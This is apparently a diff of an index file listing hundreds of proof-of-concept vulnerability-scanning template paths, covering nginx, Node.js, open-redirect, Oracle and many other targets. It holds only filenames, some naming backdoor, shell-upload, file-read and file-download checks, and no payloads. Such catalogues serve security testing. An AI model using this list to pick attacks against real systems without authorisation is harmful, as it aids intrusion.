+./poc/nginx/default-nginx-page-6881.yaml ./poc/nginx/default-nginx-page-6882.yaml ./poc/nginx/default-nginx-page-6883.yaml ./poc/nginx/git-config-nginxoffbyslash-1.yaml 
@@ -51810,9 +51791,10 @@ ./poc/nginx/git-config-nginxoffbyslash-5.yaml ./poc/nginx/git-config-nginxoffbyslash-6.yaml ./poc/nginx/git-config-nginxoffbyslash-7.yaml +./poc/nginx/git-config-nginxoffbyslash-7628.yaml ./poc/nginx/git-config-nginxoffbyslash-7629.yaml +./poc/nginx/git-config-nginxoffbyslash-7630.yaml ./poc/nginx/git-config-nginxoffbyslash-7631.yaml -./poc/nginx/git-config-nginxoffbyslash-7632.yaml ./poc/nginx/git-config-nginxoffbyslash-8.yaml ./poc/nginx/git-config-nginxoffbyslash-9.yaml ./poc/nginx/git-config-nginxoffbyslash.yaml @@ -51824,13 +51806,11 @@ ./poc/nginx/nginx-config-9096.yaml ./poc/nginx/nginx-config-9097.yaml ./poc/nginx/nginx-config-9098.yaml +./poc/nginx/nginx-config-9099.yaml ./poc/nginx/nginx-config-exposure.yaml -./poc/nginx/nginx-config.yaml ./poc/nginx/nginx-linux-page-9100.yaml ./poc/nginx/nginx-linux-page-9101.yaml -./poc/nginx/nginx-linux-page-9102.yaml ./poc/nginx/nginx-linux-page-9103.yaml -./poc/nginx/nginx-linux-page.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-1.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-2.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-3.yaml @@ -51856,7 +51836,7 @@ ./poc/nginx/nginx-version-9119.yaml ./poc/nginx/nginx-version-9120.yaml ./poc/nginx/nginx-version-9121.yaml -./poc/nginx/nginx-version-9122.yaml +./poc/nginx/nginx-version-9123.yaml ./poc/nginx/nginx-version.yaml ./poc/nginx/nginx-vhost-traffic-status-9124.yaml ./poc/nginx/nginx-vhost-traffic-status-9125.yaml @@ -51912,9 +51892,6 @@ ./poc/nodejs/grandnode.yaml ./poc/nodejs/ibm-web-traffic-express-caching-proxy.yaml ./poc/nodejs/kube-api-nodes-8507.yaml -./poc/nodejs/kube-api-nodes-8508.yaml -./poc/nodejs/kube-api-nodes.yaml -./poc/nodejs/lfr_express.yaml ./poc/nodejs/mailsite-express.yaml ./poc/nodejs/mailsiteexpress.yaml ./poc/nodejs/mongo-express-cve-2019-10758.yml 
@@ -51942,11 +51919,12 @@ ./poc/nodejs/nex-forms-express-wp-form-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/nodejs/nex-forms-express-wp-form-builder-plugin.yaml ./poc/nodejs/nex-forms-express-wp-form-builder.yaml +./poc/nodejs/node-ecstatic-listing.yaml ./poc/nodejs/node-env.yaml ./poc/nodejs/node-exporter-metrics-9135.yaml ./poc/nodejs/node-express-dev-env.yaml ./poc/nodejs/node-express-status.yaml -./poc/nodejs/node-integration-enabled-9137.yaml +./poc/nodejs/node-integration-enabled-9136.yaml ./poc/nodejs/node-integration-enabled.yaml ./poc/nodejs/node-nunjucks-ssti.yaml ./poc/nodejs/node-red-dashboard-file-read-cve-2021-3223.yml @@ -51969,7 +51947,7 @@ ./poc/nodejs/optima-express.yaml ./poc/nodejs/pcdn-cache-node.yaml ./poc/nodejs/pnpm-pnpm-lock-yaml.yaml -./poc/nodejs/puppet-node-manager-detect-9720.yaml +./poc/nodejs/puppet-node-manager-detect.yaml ./poc/nodejs/stardot-express.yaml ./poc/nodejs/sun-java-system-calendar-express.yaml ./poc/nodejs/unauthenticated-mongo-express-1.yaml @@ -51978,7 +51956,8 @@ ./poc/nodejs/unauthenticated-mongo-express-10910.yaml ./poc/nodejs/unauthenticated-mongo-express-10911.yaml ./poc/nodejs/unauthenticated-mongo-express-2.yaml -./poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml +./poc/nodejs/unauthenticated-mongo-express.yaml +./poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/nodejs/unauthorized-puppet-node-manager-detect.yaml ./poc/nodejs/webp-express-1fbe9279dc139e40de171678cc908922.yaml ./poc/nodejs/webp-express-802342a8791d6bf81a3a97aaebbba8bf.yaml 
@@ -52016,7 +51995,7 @@ ./poc/open_redirect/Url-Redirection-Catcher.yaml ./poc/open_redirect/WBCE CMS 1.6.1 - Open Redirect & CSRF.yaml ./poc/open_redirect/WordPress-Begin_Themes-Redirection.yaml -./poc/open_redirect/age-gate-open-redirect-207.yaml +./poc/open_redirect/age-gate-open-redirect.yaml ./poc/open_redirect/all-404-pages-redirect-to-homepage-cdee863c21664bd13f1b773588ad086d.yaml ./poc/open_redirect/all-404-pages-redirect-to-homepage.yaml ./poc/open_redirect/all-404-redirect-to-homepage-089607c10a667d577534d7f54440d6ac.yaml @@ -52036,8 +52015,8 @@ ./poc/open_redirect/aspnuke-openredirect-557.yaml ./poc/open_redirect/attitude-theme-open-redirect-587.yaml ./poc/open_redirect/attitude-theme-open-redirect-588.yaml -./poc/open_redirect/attitude-theme-open-redirect.yaml ./poc/open_redirect/attitude-wp-theme-open-redirect.yaml +./poc/open_redirect/aws-redirect-651.yaml ./poc/open_redirect/aws-redirect-652.yaml ./poc/open_redirect/aws-redirect-653.yaml ./poc/open_redirect/aws-redirect-654.yaml @@ -52056,7 +52035,6 @@ ./poc/open_redirect/bitrix-open-redirect-8.yaml ./poc/open_redirect/bitrix-open-redirect-9.yaml ./poc/open_redirect/bitrix-open-redirect.yaml -./poc/open_redirect/brandfolder-open-redirect-779.yaml ./poc/open_redirect/brandfolder-open-redirect-780.yaml ./poc/open_redirect/brandfolder-open-redirect-781.yaml ./poc/open_redirect/brandfolder-open-redirect-782.yaml 
@@ -52086,9 +52064,9 @@ ./poc/open_redirect/drupal_module-pubdlcnt-open-redirect-vulnerability.yaml ./poc/open_redirect/easy-redirect-manager-15a476cd8a1fcf1c6c6e059975b58c8a.yaml ./poc/open_redirect/easy-redirect-manager.yaml +./poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml ./poc/open_redirect/eatery-restaurant-open-redirect-7159.yaml ./poc/open_redirect/eatery-restaurant-open-redirect-7160.yaml -./poc/open_redirect/eatery-restaurant-open-redirect.yaml ./poc/open_redirect/eatery-restaurant-wp-theme-open-redirect.yaml ./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml ./poc/open_redirect/edd-conditional-success-redirects.yaml @@ -52118,13 +52096,11 @@ ./poc/open_redirect/homeautomation-v3-openredirect-7982.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7983.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7984.yaml -./poc/open_redirect/homeautomation-v3-openredirect-7985.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7986.yaml ./poc/open_redirect/htaccess-redirect-15d8c137823c3b6979566e3d6ce26232.yaml ./poc/open_redirect/htaccess-redirect.yaml ./poc/open_redirect/httpbin-open-redirect-8048.yaml ./poc/open_redirect/httpbin-open-redirect-8049.yaml -./poc/open_redirect/httpbin-open-redirect.yaml ./poc/open_redirect/httpbin-open-redirect.yml ./poc/open_redirect/https-to-http-redirect.yaml ./poc/open_redirect/icewarp-openredirects.yaml @@ -52145,6 +52121,7 @@ ./poc/open_redirect/msmc-redirect-after-comment.yaml ./poc/open_redirect/multiple-parameters-openredirect.yaml ./poc/open_redirect/music-store-open-redirect-8972.yaml +./poc/open_redirect/music-store-open-redirect.yaml ./poc/open_redirect/netsweeper-open-redirect-9063.yaml ./poc/open_redirect/netsweeper-open-redirect-9064.yaml ./poc/open_redirect/netsweeper-open-redirect.yaml 
@@ -52153,7 +52130,6 @@ ./poc/open_redirect/newsletter-open-redirect-9076.yaml ./poc/open_redirect/newsletter-open-redirect-9077.yaml ./poc/open_redirect/newsletter-open-redirect-9078.yaml -./poc/open_redirect/newsletter-open-redirect.yaml ./poc/open_redirect/nextjs-redirect.yaml ./poc/open_redirect/ninjaform-open-redirect-9133.yaml ./poc/open_redirect/ninjaform-open-redirect-9134.yaml @@ -52161,13 +52137,13 @@ ./poc/open_redirect/noptin-open-redirect.yaml ./poc/open_redirect/novnc-url-redirection-cve-2021-3654.yml ./poc/open_redirect/oRedirect1.yaml +./poc/open_redirect/odoo-cms-redirect-9199.yaml ./poc/open_redirect/odoo-cms-redirect-9200.yaml ./poc/open_redirect/odoo-cms-redirect-9201.yaml ./poc/open_redirect/odoo-openredirect.yaml ./poc/open_redirect/office365-open-redirect-9212.yaml ./poc/open_redirect/office365-open-redirect-9213.yaml ./poc/open_redirect/office365-open-redirect-9214.yaml -./poc/open_redirect/office365-open-redirect-9215.yaml ./poc/open_redirect/ojs-unauthenticated-open-redirect.yaml ./poc/open_redirect/open-redirect-00.yaml ./poc/open_redirect/open-redirect-01.yaml @@ -52214,7 +52190,6 @@ ./poc/open_redirect/open_redirect.yaml ./poc/open_redirect/openredirect.yaml ./poc/open_redirect/oracle-ebusiness-openredirect.yaml -./poc/open_redirect/otobo-open-redirect-9409.yaml ./poc/open_redirect/otobo-open-redirect-9410.yaml ./poc/open_redirect/otobo-open-redirect-9411.yaml ./poc/open_redirect/peters-login-redirect-099f67628707b3f385b479015262ac32.yaml 
@@ -52224,8 +52199,8 @@ ./poc/open_redirect/pieregister-open-redirect-9577.yaml ./poc/open_redirect/pieregister-open-redirect-9578.yaml ./poc/open_redirect/pieregister-open-redirect-9579.yaml -./poc/open_redirect/pieregister-plugin-open-redirect.yaml ./poc/open_redirect/pollbot-redirect-9621.yaml +./poc/open_redirect/pollbot-redirect-9622.yaml ./poc/open_redirect/pollbot-redirect-9623.yaml ./poc/open_redirect/postcode-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/postcode-redirect-8fce0528958fb8f6fccd77f326340662.yaml @@ -52372,7 +52347,6 @@ ./poc/open_redirect/sap-redirect-10065.yaml ./poc/open_redirect/sap-redirect-10066.yaml ./poc/open_redirect/sap-redirect-10067.yaml -./poc/open_redirect/sap-redirect.yaml ./poc/open_redirect/seo-redirection-00236bb3125835cea1f664a5a2990898.yaml ./poc/open_redirect/seo-redirection-02c98a3021ab90d177604810266eda87.yaml ./poc/open_redirect/seo-redirection-19ac51f8b0405a9ec28804b8aaa29d9c.yaml @@ -52423,7 +52397,6 @@ ./poc/open_redirect/thinkific-redirect-10737.yaml ./poc/open_redirect/tpg-redirect-85f56196634b8bf7c02f780064a6fc7d.yaml ./poc/open_redirect/tpg-redirect.yaml -./poc/open_redirect/ultimatemember-open-redirect-10877.yaml ./poc/open_redirect/ultimatemember-open-redirect-10878.yaml ./poc/open_redirect/ultimatemember-open-redirect-10879.yaml ./poc/open_redirect/ultimatemember-plugin-open-redirect.yaml 
@@ -52436,16 +52409,14 @@ ./poc/open_redirect/weekender-newspaper-open-redirect-11186.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11187.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11188.yaml -./poc/open_redirect/weekender-newspaper-open-redirect.yaml ./poc/open_redirect/weekender-newspaper-wp-theme-open-redirect.yaml ./poc/open_redirect/woo-login-redirect-317022364d5cdae673f22cdada5aba50.yaml ./poc/open_redirect/woo-login-redirect-e4654f9a46c58ec7da5e9256a56d6e89.yaml ./poc/open_redirect/woo-login-redirect.yaml ./poc/open_redirect/woocommerce-add-to-cart-custom-redirect-64a9b17becafc7bb8d1d5b45684524cd.yaml ./poc/open_redirect/woocommerce-add-to-cart-custom-redirect.yaml -./poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml ./poc/open_redirect/wordpress-redirection-plugin-listing-11307.yaml -./poc/open_redirect/wordpress-redirection-plugin-listing.yaml +./poc/open_redirect/wordpress-redirection-plugin-listing-11308.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-062dffbc9ba36d2c45b3c3ca1f34e0d3.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-76a6410aed89ec5d80b58eb825a4989b.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-c3c279f6a773c00d7aae3e43cf34cb82.yaml 
@@ -52454,20 +52425,20 @@ ./poc/open_redirect/wp-brandfolder-plugin-open-redirect.yaml ./poc/open_redirect/wp-domain-redirect-e5bf6ab8eeb40788caddb9493fd84dca.yaml ./poc/open_redirect/wp-domain-redirect.yaml +./poc/open_redirect/wp-grimag-open-redirect-11458.yaml ./poc/open_redirect/wp-grimag-open-redirect-11459.yaml ./poc/open_redirect/wp-grimag-open-redirect-11460.yaml ./poc/open_redirect/wp-grimag-open-redirect-11461.yaml ./poc/open_redirect/wp-grimag-open-redirect-11462.yaml +./poc/open_redirect/wp-gtranslate-open-redirect-11463.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11464.yaml -./poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11466.yaml -./poc/open_redirect/wp-gtranslate-open-redirect.yaml ./poc/open_redirect/wp-login-and-logout-redirect-bcc9e091fa98d610ac79a7162207c92e.yaml ./poc/open_redirect/wp-login-and-logout-redirect.yaml -./poc/open_redirect/wp-prostore-open-redirect-11546.yaml ./poc/open_redirect/wp-prostore-open-redirect-11547.yaml ./poc/open_redirect/wp-prostore-open-redirect-11548.yaml ./poc/open_redirect/wp-prostore-open-redirect-11549.yaml +./poc/open_redirect/wp-prostore-open-redirect-11550.yaml ./poc/open_redirect/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml ./poc/open_redirect/wp-search-keyword-redirect.yaml ./poc/open_redirect/wp-security-open-redirect.yaml @@ -52485,6 +52456,7 @@ ./poc/open_redirect/wpcf7-redirect-abd6bd305348b8021e7310c8ca2e06d0.yaml ./poc/open_redirect/wpcf7-redirect-c8c16c617550c7db690dbef59bc3b26a.yaml ./poc/open_redirect/wpcf7-redirect.yaml +./poc/open_redirect/wptouch-open-redirect-11592.yaml ./poc/open_redirect/wptouch-open-redirect-11593.yaml ./poc/open_redirect/wptouch-open-redirect-11594.yaml ./poc/open_redirect/wptouch-open-redirect-11595.yaml 
@@ -52509,9 +52481,9 @@ ./poc/oracle/default-oracle-application-page-6893.yaml ./poc/oracle/default-oracle-application-page.yaml ./poc/oracle/dms-oracle.yaml +./poc/oracle/metadata-oracle-8829.yaml ./poc/oracle/metadata-oracle-8830.yaml ./poc/oracle/metadata-oracle-8831.yaml -./poc/oracle/metadata-oracle.yaml ./poc/oracle/oracle-access-management.yaml ./poc/oracle/oracle-access-manager.yaml ./poc/oracle/oracle-adf-faces.yaml @@ -52520,7 +52492,6 @@ ./poc/oracle/oracle-business-control-9344.yaml ./poc/oracle/oracle-business-control-9345.yaml ./poc/oracle/oracle-business-control-9346.yaml -./poc/oracle/oracle-business-control-9347.yaml ./poc/oracle/oracle-business-control-9348.yaml ./poc/oracle/oracle-business-control.yaml ./poc/oracle/oracle-business-intelligence-password.yaml @@ -52529,8 +52500,6 @@ ./poc/oracle/oracle-containers-panel.yaml ./poc/oracle/oracle-dbass-detect-9349.yaml ./poc/oracle/oracle-dbass-detect-9350.yaml -./poc/oracle/oracle-dbass-detect-9351.yaml -./poc/oracle/oracle-dbass-detect.yaml ./poc/oracle/oracle-dbcs-9352.yaml ./poc/oracle/oracle-dbcs-9353.yaml ./poc/oracle/oracle-dbcs-9354.yaml @@ -52552,7 +52521,6 @@ ./poc/oracle/oracle-ebs-desr.yaml ./poc/oracle/oracle-ebs-lfi.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9367.yaml -./poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9372.yaml @@ -52560,8 +52528,8 @@ ./poc/oracle/oracle-ebs-xss-1.yaml ./poc/oracle/oracle-ebs-xss-2.yaml ./poc/oracle/oracle-ebs-xss-3.yaml +./poc/oracle/oracle-ebs-xss-9373.yaml ./poc/oracle/oracle-ebs-xss-9375.yaml -./poc/oracle/oracle-ebs-xss-9376.yaml ./poc/oracle/oracle-ebs-xss-9377.yaml ./poc/oracle/oracle-ebs-xss.yaml ./poc/oracle/oracle-ebusiness-openredirect.yaml 
@@ -52576,20 +52544,20 @@ ./poc/oracle/oracle-http-server-12c-9381.yaml ./poc/oracle/oracle-http-server-12c-9382.yaml ./poc/oracle/oracle-http-server-12c-9383.yaml +./poc/oracle/oracle-http-server-12c-9384.yaml ./poc/oracle/oracle-http-server-12c.yaml ./poc/oracle/oracle-httpserver12c.yaml -./poc/oracle/oracle-integrated-manager-9386.yaml ./poc/oracle/oracle-integrated-manager-9387.yaml ./poc/oracle/oracle-integrated-manager-9388.yaml ./poc/oracle/oracle-integrated-manager-9389.yaml ./poc/oracle/oracle-integrated-manager-9390.yaml ./poc/oracle/oracle-integrated-manager.yaml ./poc/oracle/oracle-iplanet-web-server-9391.yaml +./poc/oracle/oracle-iplanet-web-server-9392.yaml ./poc/oracle/oracle-iplanet-web-server-9393.yaml -./poc/oracle/oracle-iplanet-web-server.yaml ./poc/oracle/oracle-oam-xss.yaml +./poc/oracle/oracle-opera-login.yaml ./poc/oracle/oracle-opera.yaml -./poc/oracle/oracle-people-enterprise-9394.yaml ./poc/oracle/oracle-people-enterprise-9395.yaml ./poc/oracle/oracle-people-enterprise-9396.yaml ./poc/oracle/oracle-people-enterprise-9397.yaml @@ -52863,7 +52831,6 @@ ./poc/other/Avada.yaml ./poc/other/B2Bbuilder_v7-getshell.yaml ./poc/other/Bitrix_Account_UIDH.yaml -./poc/other/Bitrix_check_env.yaml ./poc/other/Bitrix_server_testcheck.yaml ./poc/other/CISA.yaml ./poc/other/CORS Pre-Flight Bypass.yaml @@ -52939,6 +52906,7 @@ ./poc/other/LPDString.yaml ./poc/other/LSCP.yaml ./poc/other/LayerSlider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/LayerSlider-plugin.yaml ./poc/other/LibreOfficeImpressSCPair.yaml ./poc/other/LiveBOS_ShowImage_FileRead.yaml ./poc/other/Lm-FileRead.yaml @@ -53048,7 +53016,6 @@ ./poc/other/X-Host.yaml ./poc/other/X-Remote-Addr .yaml ./poc/other/X-Remote-IP .yaml -./poc/other/X-Remote-IP.yaml ./poc/other/X-Rewrite-URL.yaml ./poc/other/X11Probe.yaml ./poc/other/Yes-059f1c0288ee3dfe1136ff4836457838.yaml 
@@ -53347,6 +53314,7 @@ ./poc/other/aceide-14b870f70e50eff1b77bf2010d096cc3.yaml ./poc/other/aceide.yaml ./poc/other/acenet-acereporter-report-component-arbitrary-file-download.yaml +./poc/other/acenet-panel.yaml ./poc/other/acf-blocks-72203531faf01029b7468e544a690bea.yaml ./poc/other/acf-blocks-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/acf-blocks-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -53429,10 +53397,10 @@ ./poc/other/activello-eb89877ab588a18f94a6a8698e8b083b.yaml ./poc/other/activello-fbae3dec6ddfe8541595eba73b51e18b.yaml ./poc/other/activello.yaml -./poc/other/activemq-panel-49.yaml ./poc/other/activemq-panel-50.yaml ./poc/other/activemq-panel-51.yaml ./poc/other/activemq-panel-52.yaml +./poc/other/activemq-panel-53.yaml ./poc/other/activemq-panel.yaml ./poc/other/activemq-workflow.yaml ./poc/other/activity-reactions-for-buddypress-b67dd1397f4398dc9c75761e3da9f36b.yaml @@ -53446,11 +53414,11 @@ ./poc/other/activitytime.yaml ./poc/other/actuator.yaml ./poc/other/acunetix-360-installer.yaml -./poc/other/acunetix-panel-54.yaml ./poc/other/acunetix-panel-55.yaml +./poc/other/acunetix-panel-56.yaml ./poc/other/acunetix-panel-57.yaml +./poc/other/acunetix-panel-58.yaml ./poc/other/acunetix-panel-59.yaml -./poc/other/acunetix-panel.yaml ./poc/other/acunetix-wvs.yaml ./poc/other/acymailing-882e0d234614e9072c071f9d28362d8a.yaml ./poc/other/acymailing-e3e6bd9ad6bff9c17b39c48f591400ea.yaml @@ -53783,9 +53751,9 @@ ./poc/other/adminer-panel-5.yaml ./poc/other/adminer-panel-6.yaml ./poc/other/adminer-panel-7.yaml -./poc/other/adminer-panel-74.yaml ./poc/other/adminer-panel-75.yaml ./poc/other/adminer-panel-76.yaml +./poc/other/adminer-panel-77.yaml ./poc/other/adminer-panel.yaml ./poc/other/adminer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/adminer-plugin.yaml 
@@ -53816,7 +53784,7 @@ ./poc/other/adminpad-024c994284cb4846e1f6626814560a64.yaml ./poc/other/adminpad.yaml ./poc/other/adminset-panel-78.yaml -./poc/other/adminset-panel-80.yaml +./poc/other/adminset-panel-79.yaml ./poc/other/adminset-panel.yaml ./poc/other/adplugg-058141c25a1a879f99185b818d355e02.yaml ./poc/other/adplugg-4cde8c10175a7219c94dab4ded72ef4e.yaml @@ -53884,6 +53852,7 @@ ./poc/other/advance-menu-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advance-menu-manager-plugin.yaml ./poc/other/advance-menu-manager.yaml +./poc/other/advance-setup-119.yaml ./poc/other/advance-setup-120.yaml ./poc/other/advance-setup-121.yaml ./poc/other/advance-setup-122.yaml @@ -54270,7 +54239,6 @@ ./poc/other/akamai-cloudtest-250.yaml ./poc/other/akamai-cloudtest-251.yaml ./poc/other/akamai-cloudtest-252.yaml -./poc/other/akamai-cloudtest-253.yaml ./poc/other/akamai-cloudtest-254.yaml ./poc/other/akamai-cloudtest.yaml ./poc/other/akeeba-installer.yaml @@ -54325,7 +54293,6 @@ ./poc/other/alibaba-anyproxy-fetchbody-anyfile-read.yaml ./poc/other/alibaba-anyproxy.yaml ./poc/other/alibaba-canal-info-leak-264.yaml -./poc/other/alibaba-canal-info-leak-266.yaml ./poc/other/alibaba-canal-info-leak-267.yaml ./poc/other/alibaba-canal-info-leak.yaml ./poc/other/alibaba-canal-info-leak.yml @@ -54333,6 +54300,7 @@ ./poc/other/alibaba-nacos.yaml ./poc/other/alibaba-企业邮箱.yaml ./poc/other/alibaba_canal.yaml +./poc/other/alienvault-usm-271.yaml ./poc/other/alienvault-usm-272.yaml ./poc/other/alienvault-usm-273.yaml ./poc/other/alienvault-usm-274.yaml 
@@ -54596,10 +54564,11 @@ ./poc/other/amplus-theme.yaml ./poc/other/amplus.yaml ./poc/other/ampps-admin-panel-304.yaml -./poc/other/ampps-admin-panel-305.yaml +./poc/other/ampps-admin-panel-306.yaml +./poc/other/ampps-dirlisting-307.yaml ./poc/other/ampps-dirlisting-308.yaml -./poc/other/ampps-dirlisting.yaml ./poc/other/ampps-panel-309.yaml +./poc/other/ampps-panel-310.yaml ./poc/other/ampps-panel-311.yaml ./poc/other/amprion-gridloss-panel.yaml ./poc/other/amr-ical-events-list-79f8d987b4bea1a528f8215f9b8ae142.yaml @@ -54694,6 +54663,7 @@ ./poc/other/announcer.yaml ./poc/other/anonymous-restricted-content-a1c228113f48faf98c264ba16b96c84a.yaml ./poc/other/anonymous-restricted-content.yaml +./poc/other/ansible-semaphore-panel.yaml ./poc/other/ansible-semaphore-panel.yml ./poc/other/answer-my-question-8a0ce85767e93614bc51f451c8474050.yaml ./poc/other/answer-my-question-90c1ca4071e6bd7fcadc8c89c4c29851.yaml @@ -54746,9 +54716,9 @@ ./poc/other/antreas-66ba1859ab560343222a23f4bdd2510b.yaml ./poc/other/antreas-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/antreas.yaml -./poc/other/antsword-backdoor-333.yaml ./poc/other/antsword-backdoor-334.yaml ./poc/other/antsword-backdoor-335.yaml +./poc/other/antsword-backdoor.yaml ./poc/other/anual-archive-233a1eb6f6f8782c599ef9a31673793f.yaml ./poc/other/anual-archive-9a361b8a04b5344c6923b947e14e5de1.yaml ./poc/other/anual-archive-e3376d4b2f2bf202a6fcc995d3f8fb1c.yaml @@ -55052,7 +55022,6 @@ ./poc/other/articlepublisherpro.yaml ./poc/other/artifactory-anonymous-deploy-547.yaml ./poc/other/artifactory-anonymous-deploy-548.yaml -./poc/other/artifactory-anonymous-deploy-549.yaml ./poc/other/artifactory-anonymous-deploy.yaml ./poc/other/artifactory-workflow.yaml ./poc/other/artifactory_deploy.yaml 
@@ -55131,6 +55100,7 @@ ./poc/other/aspose-doc-exporter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/aspose-doc-exporter-plugin.yaml ./poc/other/aspose-doc-exporter.yaml +./poc/other/aspose-file-download-558.yaml ./poc/other/aspose-file-download-559.yaml ./poc/other/aspose-file-download-560.yaml ./poc/other/aspose-file-download-561.yaml @@ -55155,8 +55125,8 @@ ./poc/other/aspose-pdf-file-download-567.yaml ./poc/other/aspose-pdf-file-download-568.yaml ./poc/other/aspose-pdf-file-download-569.yaml -./poc/other/aspose-pdf-file-download.yaml ./poc/other/aspose-words-exporter-file-download.yaml +./poc/other/aspose-words-file-download-571.yaml ./poc/other/aspose-words-file-download-572.yaml ./poc/other/aspose-words-file-download-573.yaml ./poc/other/aspose-words-file-download-574.yaml @@ -55289,6 +55259,7 @@ ./poc/other/audio-video-download-buttons-for-youtube-plugin.yaml ./poc/other/audio-video-download-buttons-for-youtube.yaml ./poc/other/audio.yaml +./poc/other/audiobookshelf-panel.yaml ./poc/other/audit.yaml ./poc/other/augmented-reality-1c6032510cc675f4443ed5957cd5ebf8.yaml ./poc/other/augmented-reality-afd76b54e4672fae1a12cf88cc16c59a.yaml @@ -55366,7 +55337,6 @@ ./poc/other/automatic-youtube-video-posts-91707c7304defdf4c829758df5f60ae2.yaml ./poc/other/automatic-youtube-video-posts.yaml ./poc/other/automation-direct-596.yaml -./poc/other/automation-direct-597.yaml ./poc/other/automatisch-panel.yaml ./poc/other/autoptimize-1cd3f0584531536972eeaec5bd981bf9.yaml ./poc/other/autoptimize-2ecfdf7e957d875bca93a4c9bd866fc9.yaml @@ -55552,7 +55522,7 @@ ./poc/other/axis-happyaxis-3.yaml ./poc/other/axis-happyaxis-4.yaml ./poc/other/axis-happyaxis-669.yaml -./poc/other/axis-happyaxis-670.yaml +./poc/other/axis-happyaxis.yaml ./poc/other/axublog_v1-app-lfr.yaml ./poc/other/axway-securetransport-panel.yaml ./poc/other/axxon-client-panel.yaml 
@@ -55688,8 +55658,8 @@ ./poc/other/barelycorporate-theme.yaml ./poc/other/barelycorporate.yaml ./poc/other/barracuda-panel-684.yaml -./poc/other/barracuda-panel-685.yaml ./poc/other/barracuda-panel-686.yaml +./poc/other/barracuda-panel.yaml ./poc/other/barracuda-ssl-vpn.yaml ./poc/other/base64-encoderdecoder-09686b367b0230c3ebddda7a7420b807.yaml ./poc/other/base64-encoderdecoder-944ed1eede1fb5405084bd3b6720d51a.yaml @@ -55707,10 +55677,10 @@ ./poc/other/basic-cors-694.yaml ./poc/other/basic-cors-flash.yaml ./poc/other/basic-cors.yaml -./poc/other/basic-dns-example.yaml ./poc/other/basic-interactive-world-map-5a936b7212cd70626f050c9aba22bae7.yaml ./poc/other/basic-interactive-world-map.yaml ./poc/other/basic-ztls.yaml +./poc/other/basic.yaml ./poc/other/basicdir.yaml ./poc/other/baslider-2f67fdfc4f1a78ca3de5bde446cb180a.yaml ./poc/other/baslider-74e4a2a8812ec01ced90b2ffbb2ed2e3.yaml @@ -55967,6 +55937,7 @@ ./poc/other/betteroptin-09712df89f849ba85b08f5f0deb0865b.yaml ./poc/other/betteroptin.yaml ./poc/other/beyeon-iot.yaml +./poc/other/beyondtrust-panel-720.yaml ./poc/other/beyondtrust-panel-721.yaml ./poc/other/beyondtrust-panel.yaml ./poc/other/beyondtrust-priv-panel.yaml @@ -56015,7 +55986,6 @@ ./poc/other/bigip-pwner-workflow.yaml ./poc/other/bigip-rest-panel.yaml ./poc/other/bigip-workflow.yaml -./poc/other/bigip.yaml ./poc/other/bilin-uag系列网关.yaml ./poc/other/billingo-8170de96a4160ed4ed65414450456c1d.yaml ./poc/other/billingo.yaml @@ -56068,8 +56038,8 @@ ./poc/other/bitrix-log-file-found.yaml ./poc/other/bitrix-panel-746.yaml ./poc/other/bitrix-panel-747.yaml +./poc/other/bitrix-panel-748.yaml ./poc/other/bitrix-panel-749.yaml -./poc/other/bitrix-panel-750.yaml ./poc/other/bitrix-panel.yaml ./poc/other/bitrix-registration.yaml ./poc/other/bitrix-site-manager.yaml 
@@ -56443,7 +56413,7 @@ ./poc/other/bookshelf-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bookshelf-plugin.yaml ./poc/other/bookshelf.yaml -./poc/other/bookstack-panel-767.yaml +./poc/other/bookstack-panel-766.yaml ./poc/other/bookstack-panel.yaml ./poc/other/bookx-5affa43bf6a3586e393859cf0e61918f.yaml ./poc/other/bookx.yaml @@ -56758,8 +56728,8 @@ ./poc/other/bubble-menu-825844feae3c0993ba26ca24f6beb496.yaml ./poc/other/bubble-menu-954097b83211a929d7262429b922e34b.yaml ./poc/other/bubble-menu.yaml -./poc/other/buddy-panel-797.yaml ./poc/other/buddy-panel.yaml +./poc/other/buddy-panel.yml ./poc/other/buddybadges-14c7b37e2a39ea3c10caf2185d80b202.yaml ./poc/other/buddybadges.yaml ./poc/other/buddyboss-media-794752612993f73caae67523973ec768.yaml @@ -57155,13 +57125,13 @@ ./poc/other/cachethq.yaml ./poc/other/cacti-WeakPass.yaml ./poc/other/cacti-cacti-info.yaml -./poc/other/cacti-panel-829.yaml +./poc/other/cacti-panel-828.yaml ./poc/other/cacti-panel.yaml ./poc/other/cacti-weathermap-file-write-1.yaml ./poc/other/cacti-weathermap-file-write-2.yaml ./poc/other/cacti-weathermap-file-write-830.yaml 